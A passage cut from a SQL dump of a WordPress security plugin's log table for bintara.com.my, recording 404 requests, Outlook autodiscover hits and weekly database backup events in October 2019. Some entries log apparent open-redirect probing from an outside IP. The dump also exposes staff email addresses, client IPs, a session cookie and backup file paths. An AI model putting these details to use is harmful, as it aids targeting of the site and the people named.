";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ1gkjYvewXbs3FTz9-MSAAAAZU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570594962.8541\";s:12:\"REQUEST_TIME\";s:10:\"1570594962\";}}','notice','2019-10-09 04:22:45','2019-10-09 04:22:43',35792240,37590272,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27763,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58423\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ1cGns0xjDTAaZG0-ioywAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570593818.9607\";s:12:\"REQUEST_TIME\";s:10:\"1570593818\";}}','notice','2019-10-09 04:03:40','2019-10-09 04:03:39',35035480,36854576,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27760,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-10-09 03:46:27','2019-10-09 03:45:32',37368568,127389504,'wp-cron',1,0,'103.6.198.69'),(27761,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1569986926;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191009-114534-I6lVza8r53SYyZTCZZOs7natxXU3YR.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191009-114534-I6lVza8r53SYyZTCZZOs7natxXU3YR.zip\";s:4:\"size\";i:3989238;}','notice','2019-10-09 03:46:32','2019-10-09 03:45:32',42435248,127389504,'wp-cron',1,0,'103.6.198.69'),(27762,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:101:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:99:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58204\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ1cFTYvewXbs3FTz9-KGQAAAY4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570593813.6568\";s:12:\"REQUEST_TIME\";s:10:\"1570593813\";}}','notice','2019-10-09 04:03:35','2019-10-09 04:03:34',35031032,36839848,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27759,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{DE07EDFB-E1F0-484F-91EF-FF7018AB273A}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ1O-gdB7FBR0bQuaTuIKgAAAAA\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"54268\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ1O-gdB7FBR0bQuaTuIKgAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570590462.2301\";s:12:\"REQUEST_TIME\";s:10:\"1570590462\";}}','notice','2019-10-09 03:07:44','2019-10-09 03:07:42',35398432,37191240,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27758,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{8C525DBC-CE23-444C-83AF-0798E4476F75}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ09aoxV0SvqUWaw3AGQlAAAAVE\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53883\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ09aoxV0SvqUWaw3AGQlAAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570585962.383\";s:12:\"REQUEST_TIME\";s:10:\"1570585962\";}}','notice','2019-10-09 01:52:45','2019-10-09 01:52:42',35791952,37586792,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27757,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"64E6DD88-5984-4560-979A-1920A277454E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0yiHs0xjDTAaZG0-ig4gAAAIo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"50703\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0yiHs0xjDTAaZG0-ig4gAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570583176.4667\";s:12:\"REQUEST_TIME\";s:10:\"1570583176\";}}','notice','2019-10-09 01:06:18','2019-10-09 01:06:16',35398192,37205408,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27756,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7C787F99-5566-4302-8A66-D962B82B406F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0xlIxV0SvqUWaw3AGIhgAAAUg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"50165\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0xlIxV0SvqUWaw3AGIhgAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582932.2951\";s:12:\"REQUEST_TIME\";s:10:\"1570582932\";}}','notice','2019-10-09 01:02:14','2019-10-09 01:02:12',35787232,37585128,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.59'),(27755,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{D113DA92-F460-41E9-9748-CE12982F7B02}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wcIxV0SvqUWaw3AGHzgAAAUc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wcIxV0SvqUWaw3AGHzgAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582640.9087\";s:12:\"REQUEST_TIME\";s:10:\"1570582640\";}}','notice','2019-10-09 00:57:22','2019-10-09 00:57:21',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27754,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 